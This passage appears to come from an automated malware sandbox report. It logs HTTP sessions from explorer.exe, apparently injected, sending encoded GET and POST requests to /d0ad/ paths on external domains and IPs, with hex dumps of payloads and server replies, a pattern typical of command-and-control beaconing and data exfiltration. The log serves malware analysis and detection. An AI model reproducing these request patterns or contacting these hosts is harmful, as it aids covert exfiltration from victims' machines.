62 32 4b 48 7a 68 54 5a 75 48 34 4a 55 52 70 55 39 31 51 54 39 6a 4b 30 4b 67 74 54 53 64 28 46 42 53 36 77 78 72 47 36 6c 6f 70 5f 6f 7a 70 46 56 71 67 30 6c 6e 63 79 61 45 4f 48 79 6d 31 53 6e 53 5a 70 39 4e 39 67 47 58 6b 5a 52 69 4f 6d 67 47 33 50 69 63 33 6a 38 33 35 78 79 66 4c 32 7a 51 71 75 46 37 38 5a 62 47 4e 74 68 6f 43 36 52 48 72 46 4e 59 66 61 34 45 65 56 28 73 5a 34 72 2d 59 35 77 52 48 4a 45 4f 7a 4f 62 6a 4c 6a 39 41 37 5a 64 70 56 57 78 4f 4e 56 68 62 79 49 59 6e 4d 62 71 53 77 70 65 2d 72 37 43 4b 68 55 51 35 72 72 4d 31 4f 31 4a 54 4b 6d 58 45 34 78 53 47 44 5f 37 48 62 43 65 4f 77 78 69 49 45 47 53 4e 52 48 45 35 50 4d 73 5f 58 78 4a 77 31 34 65 4d 4f 73 57 74 43 39 61 68 70 52 58 67 67 35 33 4c 32 66 6e 62 52 75 7a 51 59 75 70 46 77 4c 45 65 48 6c 62 6e 50 55 7e 74 4b 6b 56 41 33 61 73 44 62 30 55 32 70 50 69 4a 68 79 31 47 63 5a 46 57 54 34 35 4d 64 31 30 6a 71 58 33 7a 37 70 4e 64 74 54 6a 2d 38 4f 36 74 4a 61 6a 6f 32 6b 32 44 6c 50 30 56 75 62 32 5f 7a 46 38 4f 6b 33 41 6d 4b 52 49 62 4f 33 41 33 49 78 41 50 45 61 38 78 59 51 4b 5f 69 70 53 53 76 68 28 50 48 58 4a 35 32 44 75 43 54 41 37 32 32 50 63 6e 64 31 51 31 7a 4f 64 52 37 62 62 34 73 72 6f 30 38 74 67 6c 69 65 31 6d 79 6c 75 74 59 46 43 4a 59 4d 75 57 55 4c 34 69 39 4c 66 35 66 63 4d 72 56 77 4c 6e 44 48 51 6b 74 70 70 37 52 4b 46 55 65 5f 78 56 6f 6c 50 42 59 75 67 46 49 41 36 36 64 2d 4b 48 6a 54 78 76 69 35 56 5f 4f 66 71 77 63 33 38 5a 51 30 38 79 63 74 77 33 67 68 45 63 38 6c 33 6c 28 6d 7e 37 41 39 45 63 61 4a 44 77 57 76 6e 39 6f 73 75 36 4c 62 75 6c 63 30 34 6b 4c 2d 57 78 67 61 67 42 4a 4c 56 45 46 70 57 6d 75 74 73 65 56 45 61 66 48 45 77 57 6b 54 35 38 66 77 4d 52 36 5f 74 67 79 62 36 35 37 57 69 36 4e 41 4f 79 67 74 52 30 76 63 53 45 7e 41 7a 2d 39 4c 42 66 45 50 33 47 39 71 55 72 71 73 28 6a 36 74 68 62 47 49 48 4f 71 5f 77 35 62 4e 72 49 4b 41 78 62 38 69 58 33 51 41 31 4e 36 54 72 53 41 69 33 58 35 2d 36 6a 6f 43 43 48 66 35 58 4f 7e 6c 73 48 65 52 72 6a 67 6e 6f 57 50 4b 36 78 75 39 36 4c 30 48 36 30 63 33 7e 58 4a 34 65 51 46 66 36 69 74 71 79 4f 46 6f 57 75 62 56 4c 44 36 43 41 44 67 36 57 7a 34 49 53 56 43 62 34 52 6d 30 59 4d 38 43 54 42 59 4c 59 72 4e 73 56 4d 62 2d 30 61 4f 55 7a 43 75 71 6b 52 45 71 4a 65 7e 4c 46 46 6c 67 43 77 4b 70 37 2d 33 44 7a 4a 46 56 7a 52 66 45 51 39 4a 5a 75 32 7e 53 65 75 46 69 64 51 48 4f 63 54 59 62 67 6b 41 31 38 4b 48 6c 78 56 76 6d 47 55 72 6e 4f 71 77 39 72 4e 37 53 55 49 73 5f 51 79 7a 35 65 6e 36 6b 78 37 36 37 6e 32 36 7a 55 51 4e 73 4b 75 72 68 61 72 69 46 59 76 41 43 78 54 7e 4a 37 2d 30 47 69 6d 62 74 67 66 5a 41 68 33 66 36 6c 46 66 76 6a 53 73 33 34 34 68 6c 51 36 79 69 73 79 44 76 53 41 5a 79 76 35 38 46 6f 4f 54 58 65 73 34 54 36 41 55 56 36 66 74 49 37 6a 36 63 33 63 7a 33 41 46 6c 70 31 55 74 46 71 70 59 41 61 56 44 45 4a 4b 42 4a 41 79 6c 7a 36 65 76 5f 59 6d 43 6d 69 68 34 46 6e 32 49 6f 30 54 6c 6c 33 52 65 55 58 65 38 75 31 54 55 74 41 71 77 39 6b 59 5a 32 4a 7a 50 2d 33 43 4e 6e 46 43 4c 6b 54 39 4a 73 63 7a 44 79 54 6b 55 36 4c 46 76 7a 57 41 52 64 54 45 45 73 31 32 53 71 63 71 42 30 34 46 28 35 77 69 55 79 74 51 59 5a 75 30 74 37 55 32 58 78 38 62 75 46 32 74 69 67 4d 5a 61 6b 53 37 33 30 31 32 52 30 57 6d 72 46 7a 6b 61 48 44 78 76 31 36 79 46 49 71 61 65 39 64 64 42 43 66 70 58 30 49 39 6c 30 77 58 6b 72 78 35 31 52 46 6b 61 4d 6b 39 4c 42 4c 6b 48 Data Ascii: jXu=nmS7BbHxhSgaeHCUnmyOvdsoi4a2XYf-FanCaXcxQ0uEkZ5IxAPinHRswmhjcNNyw0NwsSRZbIcyS9c0EtFj4AYHETrQPgxhl9uHMe3xKE08mQFORhX2(W2C7C5izpSI72MH8iIkDOUJa-P0Qrlc~Oh0biV84T8lyWhQpOPPbrh-1jjWRUPeJif9YERVh0ac3nzV9c(hM-VfmSEZvRRlDaWp1FjySnI2H8~KZPfQt9RAb2KHzhTZuH4JURpU91QT9jK0KgtTSd(FBS6wxrG6lop_ozpFVqg0lncyaEOHym1SnSZp9N9gGXkZRiOmgG3Pic3j835xyfL2zQquF78ZbGNthoC6RHrFNYfa4EeV(sZ4r-Y5wRHJEOzObjLj9A7ZdpVWxONVhbyIYnMbqSwpe-r7CKhUQ5rrM1O1JTKmXE4xSGD_7HbCeOwxiIEGSNRHE5PMs_XxJw14eMOsWtC9ahpRXgg53L2fnbRuzQYupFwLEeHlbnPU~tKkVA3asDb0U2pPiJhy1GcZFWT45Md10jqX3z7pNdtTj-8O6tJajo2k2DlP0Vub2_zF8Ok3AmKRIbO3A3IxAPEa8xYQK_ipSSvh(PHXJ52DuCTA722Pcnd1Q1zOdR7bb4sro08tglie1mylutYFCJYMuWUL4i9Lf5fcMrVwLnDHQktpp7RKFUe_xVolPBYugFIA66d-KHjTxvi5V_Ofqwc38ZQ08yctw3ghEc8l3l(m~7A9EcaJDwWvn9osu6Lbulc04kL-WxgagBJLVEFpWmutseVEafHEwWkT58fwMR6_tgyb657Wi6NAOygtR0vcSE~Az-9LBfEP3G9qUrqs(j6thbGIHOq_w5bNrIKAxb8iX3QA1N6TrSAi3X5-6joCCHf5XO~lsHeRrjgnoWPK6xu96L0H60c3~XJ4eQFf6itqyOFoWubVLD6CADg6Wz4ISVCb4Rm0YM8CTBYLYrNsVMb-0aOUzCuqkREqJe~LFFlgCwKp7-3DzJFVzRfEQ9JZu2~SeuFidQHOcTYbgkA18KHlxVvmGUrnOqw9rN7SUIs_Qyz5en6kx767n26zUQNsKurhariFYvACxT~J7-0GimbtgfZAh3f6lFfvjSs344hlQ6yisyDvSAZyv58FoOTXes4T6AUV6ftI7j6c3cz3AFlp1UtFqpYAaVDEJKBJAylz6ev_YmCmih4Fn2Io0Tll3ReUXe8u1TUtAqw9kYZ2JzP-3CNnFCLkT9JsczDyTkU6LFvzWARdTEEs12SqcqB04F(5wiUytQYZu0t7U2Xx8buF2tigMZakS73012R0WmrFzkaHDxv16yFIqae9ddBCfpX0I9l0wXkrx51RFkaMk9LBLkH-jc53LkYbE9Qvgp9JTpIJsu3FlDK7e-8omLvurBxlpJDwm6yXBiUd1BFHJtdfT7bwOy9D0eU1xRxL3y9aL2FJ6KmNt6s88nvxT4UccIk-VELk39380j093j0OnPV-XAex6QszWhRnfjjCit8Oi66mzYTlnaPZZg(NKrjyd1vnUDAuYIVQYAXLE9cBiC4DDfKXAw~7F8x8oGCeNBHRsEwBfRYor-4LfHjxRIlc6sd4Qg58Mm(sjmOUk9wVZ3kZcSrDBmUXujy2MqFZC6vC61whg5Pqfglni8qRlDKVRJnR05FXvqg9Inp0mE6aGjHMMmiQzmxxYfTC~PK3GMOZY2ERBNs5Xrl43HOsLeXfw8fzPMZdD98WrE4bZCc5I4fAIne2(bSW(fJrfH8cvUujbcizWTi8G5tXEEhei5r_OFwL8FPhBccZjAczpPOCD_xMKlawU4GXnFUoFJ(nQiTBXIh6sqwKNo3u~VkfNhjh7MRVYBgrTEOh1NodGtX-6lW_xILVBc(f2DgOLeF2qgbB95ZtsT9AkUlunM0l7jYAbzRgEFis1OAb1m6kxJghHTTIyrexy1UKvPnm6zpArU51cPN3JtZuvVZP(j9lAp~LoFOPiEYQOKo25I4p8mYnm4PSRbyToK6Jd0H1at(tLss5pnI-PqUvwnp6z53qbcXsV1nDaBlWr1umByIeXt6IiIZzWHZOyC0IU8FoA8BGMUkPaRpQRXxJdl5bhEf20O8WZjCjqHNGFWhrLN8DWq4N7symKX1b1xcWbGXAn1bwdZjgRyExMX7v5EfYFXJmkgMvi0J_9G(ovagToGJHKtq8bMZqo658YpXZTT3hIiDt8dvvj3TjkvYXII49(eZ2Oiy2OvNTTPvQwkpXJlp4ND4ajCHolvckletV14Kjesb-6iISFrK60dunvmYwPnrR2p02XTsmL8H97gwGDeGUkigE6a~HXCySK7bD78f_Z699pLEovJlsDCCEtTD4dB05jxL7JofH1PC7qVQFkz~jkMT28GKHqXgsCVUb~h1TJjL1Xn5obezgScR_ufTIA161Xc3fQqs_1fKPE7Ljd6yBPc6apQE5NCT59wa6qwEMJRMbS4DaateH(07mX68ccSHAE_qAmbnkLpbEV77Z9RRGw58yv9SZMrWiICSk(yMqv8z6cIwm0NDRQYegKLP2LRVmrJQbGzRV(bA3bj~zqExoHPLpGItVMgML(ij_mP7hUu2GBTJtWQLdcn6YPsy9HCZQVJKa9LRJ(KmkTSMNtqMy30sfMjX5fPLeGNDoOHU3(U0QnexTVeqIhS6QGO9VdPzamn7ROP0GiU5DWZNyYOWpIERMWSOTA-5C8-z0Tkql4PK0lVM8kEuTE9RBGjMg4jYOia0gg8tKrD0zxLlwTor36oB3WNq-kGOdmsOsAcgcwnTn(9YDTqjmITbkyi1IY3g-fR~i76tv1xCII-DogacA4xtx7fhiLfljCVdoA25GDbUJUTsnsRpEy0v9QG5N9eG8(_glzNWc3vWLv7ye(oBRa2bnQkAz4wacFy4km0czwzV71YfYQIgxb8zjPuRYkJpngCgZ9iud1ULeAYtHUr34sn20mTahV-xBfytySwNL456klJL-WYSnOSNmuztsatl1dWuubHyxu_y64NxmgjONWsMNqC(nPaVUkFDay1FNjqnil_9RLTNLqjfBFWQYpkbk0QscaBWn9HDRJqQskTrFrhdSTpP14t8X4JhAn8OOtpoTWFyY8Dah9E69XzRaOiaaq0jHjaUkrGHi7hCyvzpf8Qi6232H93tojC7kXyLW~TFPWk2S~kS89refIvd2AHcJjZ(kZ2mLZlca38ZqPe3Z2FeuH4jIR4gCjIeJkPVxV1GO~mWCEgkNHXMn2re71ziLLwYwJJ7qJ6SuWOZyeUSno67NphawW0ByHuZQmGefHIEyoMd-IZqJRjoVoZU4KaqSHdwFnHem8VcjOGvq5o33r2Sx7Itk9bFZIik2lscqAQXqJMchCwTm~-5fVNtSWu4ackfmJ1ADSVi6rmGunUWX3bEviBnsC4kxeL2aEDsI5kfaxQgcczpBCM(8l5eRocFunLtP(svXCuIiIlWmTolefgazDxhX2c540cffJLcaAV8ITunzghiYxEDtfko8fzTxNMhewA40Q2jRTLImB_rADAmJQ_ht2PCBN6pqI5nqykepDXZiL6OHK6Ftct3fJRu1ePXVu7eZtNvgAI8GnNG3R-f7Fr2KtrTr93LOZqZaRQtYc0c9erQ67iMrYU8b6kwcYDDvQrazxSH2gLBc1tTkdzTbTMOoxY~7HEiwTQmQ0C4kJFnj3LmswjtyOQOUp2VEvzMRUz79pENiC8RAC4M0EO(ff1uaA9ZIAOfzijRNU2RUlCbaJ7visEYDf4IgUYVVcvCp7vroRL~qNv2mSsoJxwkrxn8zorcz~CsUftVSJR8CfMzNzcokkDcthhMuXWYJvco5~TBm(g3HD2wQiwndo40I1qMGMx8BvxF-yHYpRn98ZzDbexTw~jApLo4t81Q2B5Bv6nukt1qtq9H_du1O5U(9jbPa~dGvOAxCYPF5lJIb53~NzHSLOuqf(dm9mDXFPjpzUk7D(SEAUokVTgXAg4jufgcF9NVo566Jxg0xkU0eMuf3r1LFX2nxQQRWs1GTpWHB6iywrE5aMYtIa2uvcAtX~Ly2c3WKi_7vG8oNO82VQ-M2GF9WDaWoGSO30Li1ei
Oct 26, 2022 13:16:28.947995901 CEST	523	OUT	Data Raw: 35 4b 69 78 78 4f 43 72 68 4d 32 6b 69 58 5a 4f 75 62 67 43 41 6f 63 57 68 72 34 6d 69 72 46 31 5a 72 76 39 61 63 56 63 67 50 5f 6b 5a 50 30 6d 4f 77 4d 43 44 61 70 47 53 62 71 64 58 4d 72 45 33 35 6d 6d 32 71 30 73 75 46 6c 43 6a 43 52 39 55 63 Data Ascii: 5KixxOCrhM2kiXZOubgCAocWhr4mirF1Zrv9acVcgP_kZP0mOwMCDapGSbqdXMrE35mm2q0suFlCjCR9UcfrACV97YJeuF-6vXzhk3o4oW2UUCX4gXFHr~6xJQ2NyNKHBy7XDYRzUBDxPSthzCf7KKmXL4b9Uggm4QngVjdYkH8p9dGNbY9L_Qp0n8dv26lFnutJ24qrpYl5Dbq(efFKBG5SE8B5IBu4g72xoR1Zta5LXFU5-(E
Oct 26, 2022 13:16:29.100759983 CEST	528	OUT	Data Raw: 46 6d 56 68 76 4c 47 76 35 65 69 6d 61 33 6b 49 69 54 58 36 64 42 75 64 50 6e 6c 55 4b 34 67 79 33 79 30 65 63 37 50 66 5a 46 6b 4c 6c 49 59 28 61 41 4b 64 61 49 6f 57 54 73 6c 58 5f 76 62 4d 58 64 4f 33 47 78 66 4e 37 47 32 45 70 31 6d 31 4e 64 Data Ascii: FmVhvLGv5eima3kIiTX6dBudPnlUK4gy3y0ec7PfZFkLlIY(aAKdaIoWTslX_vbMXdO3GxfN7G2Ep1m1NdkSuDpqkgnW_p1UVxJKNQfvFTYlfDJni(W7kxnK-oOtrP2SOp4zoEtVKpSeCLyIGhSMDm4HvlglNQQuGmyqoABf4sEPYWKliEy7R2Za94lhjrQTNWfCrz95ugr5TKmA62qOn~qZYVMqhq3bgoOky7F5kBFwOvci-1O
Oct 26, 2022 13:16:29.100938082 CEST	539	OUT	Data Raw: 34 6e 56 35 44 38 48 6b 4e 4d 6a 42 68 38 77 4c 4c 55 71 62 54 49 62 79 4a 49 57 66 63 37 31 35 57 62 41 66 55 51 63 75 44 78 6e 57 69 6b 73 53 6b 50 4c 79 52 68 76 6a 37 79 4e 41 6a 6e 32 4b 51 4c 6c 7a 39 64 45 30 5f 6c 39 4c 6e 4a 47 4e 68 79 Data Ascii: 4nV5D8HkNMjBh8wLLUqbTIbyJIWfc715WbAfUQcuDxnWiksSkPLyRhvj7yNAjn2KQLlz9dE0_l9LnJGNhyRPl~3p_RtVk6oQ6ZUs0xFT3Sx7dlUA9DWA6Uul1IrjC811q1-C9La5meuuo6TREKOIp9VeaR7R3xWyk8rBq4xfsWarz6cf-xlimzzWl2UVqpwrxRWLVdaOhjzxX5WV3gfyP0mGW5t13HFHcdFAnMrG8GA(-OwpuCG
Oct 26, 2022 13:16:29.101272106 CEST	548	OUT	Data Raw: 45 76 6c 59 38 52 6a 63 4e 79 5a 34 76 55 53 74 56 48 73 41 4b 45 32 76 42 77 4e 4e 5f 74 5f 5a 65 5a 71 73 66 35 49 51 7a 28 79 4a 67 7a 5a 70 44 35 73 45 67 36 4a 56 7a 67 48 37 6f 4c 33 46 56 33 50 45 50 4b 64 50 4d 59 69 50 61 4b 61 76 55 33 Data Ascii: EvlY8RjcNyZ4vUStVHsAKE2vBwNN_t_ZeZqsf5IQz(yJgzZpD5sEg6JVzgH7oL3FV3PEPKdPMYiPaKavU3DQbHZONwxHRUeB0PkGGKSKkBvwYix7TxeC-QsLhTP0MvVb6foAQa4rJRAhLGBlQZL134rsEq_pnNJA2OX4ZXFeDXUo-uZ7Av38zClCI4lXHFU6R2HgFoIlv0dwNWNUwtBVz4akQa88OveUvQNZR2VRjczC1XPQu5z
Oct 26, 2022 13:16:29.101437092 CEST	549	OUT	Data Raw: 6b 4a 69 78 38 56 43 7a 48 4f 47 52 4d 28 52 79 51 49 58 50 68 48 39 7a 6f 6f 42 70 46 4e 42 74 35 4f 69 36 65 30 41 36 79 32 4d 56 73 69 61 39 53 61 47 37 70 39 2d 41 79 64 4a 41 68 4c 52 74 47 66 65 6f 4b 53 31 4d 73 7e 74 66 32 73 74 4d 49 62 Data Ascii: kJix8VCzHOGRM(RyQIXPhH9zooBpFNBt5Oi6e0A6y2MVsia9SaG7p9-AydJAhLRtGfeoKS1Ms~tf2stMIbPA4bIHKm4VrY8jh8mK8rc6e6YLT25iYkIz0cTPo0gBL0bqoGe7TujL_PrbmLrEFkw054MOoA0cnBmyGUAtUB6HuajwiBmbwhk11dz0HX9a846NJESusuXES13WgNslDl2gOZGrSIWO5BPq3gyBRNCnOKmAMZCPESI
Oct 26, 2022 13:16:29.253746033 CEST	552	OUT	Data Raw: 63 61 35 4e 34 34 56 53 4f 6e 57 33 43 54 63 4d 35 63 5a 4e 48 46 6f 6f 31 57 52 45 45 39 47 33 58 31 37 4d 34 78 52 4e 77 45 64 31 6b 56 79 58 4b 33 66 46 6a 41 57 4a 68 35 46 63 42 46 65 72 41 30 53 56 46 55 53 61 57 58 2d 31 4b 70 31 78 57 44 Data Ascii: ca5N44VSOnW3CTcM5cZNHFoo1WREE9G3X17M4xRNwEd1kVyXK3fFjAWJh5FcBFerA0SVFUSaWX-1Kp1xWDYTjCGkkaC04sXQ9PvLQ(LxmOQz9akEOrabCfljCBUOqgyuMoTyGOMSaOydngJrVRWxAw9r657uFLLWwPYsVt_7N4Uw58V7jiHqF6reF7yIKYcz38hY5hptJGU4MSn6unZ~sha59f4VRQCgxMf5Tsbmep7LCrFfar4
Oct 26, 2022 13:16:29.253878117 CEST	561	OUT	Data Raw: 79 56 31 37 37 65 37 7e 77 6b 6f 35 6e 6e 74 4d 66 43 6e 30 57 56 64 5a 32 44 68 71 44 6c 41 7a 52 36 61 30 4b 5a 6f 6c 58 51 54 37 47 71 4a 69 6d 41 64 68 52 69 47 59 42 4d 6f 4a 6e 6a 4c 31 34 7e 73 69 56 6d 68 69 52 66 6c 56 41 6c 54 28 34 7a Data Ascii: yV177e7~wko5nntMfCn0WVdZ2DhqDlAzR6a0KZolXQT7GqJimAdhRiGYBMoJnjL14~siVmhiRflVAlT(4z1SA4N~5MA7rlcq0hxAnTLcfsuZyEonYnUIAeyxesZqjcgCD1CE9NBXIJG3ukdEN6MGQabFUXUkLo5jcbs4audBcVr2EOC2owIy6oXFXutb3RTHQr_Q4IPoti8PaEu4vsmLBN6t3Gavj9fmcW6SLmaTIrpnldVYRaV
Oct 26, 2022 13:16:29.254087925 CEST	563	OUT	Data Raw: 58 35 71 6f 36 76 65 73 52 7e 34 59 6a 67 74 43 59 41 6e 4d 37 4c 65 4e 6c 67 61 54 68 44 43 35 46 52 46 74 41 35 71 32 72 5a 6d 7e 78 77 6e 47 31 55 46 4b 44 34 65 35 53 61 33 6d 37 68 61 6d 36 5a 6c 55 6a 7e 67 6a 73 30 70 6b 58 53 45 39 66 4b Data Ascii: X5qo6vesR~4YjgtCYAnM7LeNlgaThDC5FRFtA5q2rZm~xwnG1UFKD4e5Sa3m7ham6ZlUj~gjs0pkXSE9fKUmAWememRSdZtKPDVc6FCqTpWblj21etoWkyCaCX97G75ACq6OmHX4FOdvKR6Zl~qV7RYN1Jg58dEHzZq97NGEYRhe2SxF9yjqET96iM8OavV9q6bNVOeh4zMi0gEFWrXPJhVu4FcqdfAvN~jzym_YCOFLkVzYizv
Oct 26, 2022 13:16:29.410176992 CEST	564	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Oct 2022 11:16:29 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.11.20	49861	162.241.217.234	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:16:31.118534088 CEST	565	OUT	GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=qk6bCrLFrTYlUGO/t3PC0vhi1ruOe5X2O7zMPSUEOWKorI5W5CC9pmQXmGdpZs8IhG91pCpdUbpgHMoHKfMckx4RAwKNJXBJ8w== HTTP/1.1 Host: www.sbgfoundation.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:16:31.284734964 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Oct 2022 11:16:31 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.11.20	49862	104.140.149.212	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:16:36.833005905 CEST	567	OUT	POST /d0ad/ HTTP/1.1 Host: www.budgaugh.com Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.budgaugh.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.budgaugh.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 4a 51 63 62 7e 54 7e 44 59 4b 7a 34 7e 79 5a 44 74 43 46 47 71 73 61 46 43 53 6e 79 33 48 38 72 75 74 45 67 42 48 4a 30 78 6d 78 57 50 45 79 47 28 77 5a 34 42 35 48 69 46 44 59 76 37 64 62 62 76 33 53 38 57 55 59 77 79 4e 4c 46 56 4a 50 4c 78 41 46 65 31 76 77 79 5a 48 4d 33 43 77 68 70 28 6f 52 57 36 73 35 6c 31 56 7e 68 7e 38 61 50 6c 61 6b 71 4a 53 48 77 51 47 79 2d 6a 45 32 6d 36 62 43 58 53 77 4e 6d 79 55 36 59 68 33 79 4a 34 62 49 6c 51 56 55 53 6b 49 64 7a 31 77 74 47 46 48 48 54 35 75 67 4e 6c 51 70 69 49 36 46 5a 42 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=JQcb~T~DYKz4~yZDtCFGqsaFCSny3H8rutEgBHJ0xmxWPEyG(wZ4B5HiFDYv7dbbv3S8WUYwyNLFVJPLxAFe1vwyZHM3Cwhp(oRW6s5l1V~h~8aPlakqJSHwQGy-jE2m6bCXSwNmyU6Yh3yJ4bIlQVUSkIdz1wtGFHHT5ugNlQpiI6FZBQ).
Oct 26, 2022 13:16:37.050643921 CEST	567	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 26 Oct 2022 11:16:36 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.4.41 Content-Encoding: gzip Data Raw: 33 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf d3 cb 28 4a 4d b3 55 d2 57 b2 b6 d1 87 4a 01 00 37 30 80 5f 23 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 32)N.,(ON,(JMUWJ70_#0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.11.20	49863	104.140.149.212	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:16:39.041793108 CEST	568	OUT	POST /d0ad/ HTTP/1.1 Host: www.budgaugh.com Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.budgaugh.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.budgaugh.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 4a 51 63 62 7e 54 7e 44 59 4b 7a 34 28 54 70 44 68 44 46 47 76 4d 61 43 63 43 6e 79 39 6e 38 76 75 74 41 67 42 47 4e 6b 78 77 4a 57 4f 6d 71 47 34 46 35 34 47 35 48 69 64 54 59 71 31 39 62 6d 76 33 65 61 57 55 30 77 79 4f 33 46 57 61 58 4c 33 77 46 52 36 50 77 78 4a 33 4d 36 47 77 68 6a 28 6f 4e 67 36 70 5a 6c 31 6c 69 68 28 2d 79 50 6e 37 6b 74 4e 79 48 32 46 57 79 39 36 30 33 6c 36 62 4f 6c 53 77 30 45 78 6e 6d 59 68 58 53 4a 71 72 49 69 65 6c 55 72 38 49 63 5f 31 78 49 44 48 45 50 77 37 38 45 76 72 53 63 79 46 49 63 48 56 35 45 5f 42 37 6d 53 38 4d 43 47 48 49 45 65 6a 54 6f 5f 78 53 4f 57 6c 68 52 4c 4d 34 6c 44 6d 4c 53 78 58 61 64 4f 49 6e 4e 49 74 72 4c 67 54 64 66 2d 51 38 31 36 42 37 28 50 65 5a 32 30 7a 58 30 4d 73 7a 45 57 65 4f 30 70 49 32 6b 75 71 75 69 34 6a 4c 72 2d 28 6e 69 32 64 70 66 31 75 5f 41 44 62 4f 46 4a 4d 6f 49 74 66 6e 79 43 75 47 67 6d 51 68 6c 65 71 57 46 30 57 6f 4d 5f 59 38 63 4d 31 74 4f 2d 65 55 30 63 38 76 72 4a 61 38 55 42 71 76 66 6b 44 2d 44 6e 37 79 72 31 70 58 68 6e 6b 76 51 64 4f 51 71 43 38 36 49 67 62 5a 48 71 4d 49 65 36 53 47 78 48 51 5a 35 6d 74 30 53 75 37 42 7e 70 74 62 48 72 70 33 71 43 62 4b 4b 65 63 34 67 54 28 70 32 35 74 75 71 50 67 67 59 69 6e 6d 48 4a 52 56 73 5a 50 42 4a 79 43 5a 28 57 44 32 43 62 53 52 33 52 6d 36 37 65 51 72 67 50 32 52 78 7a 28 59 4a 32 6f 50 6c 58 57 54 44 69 4a 79 79 50 75 66 64 55 46 4e 38 41 57 55 63 34 54 72 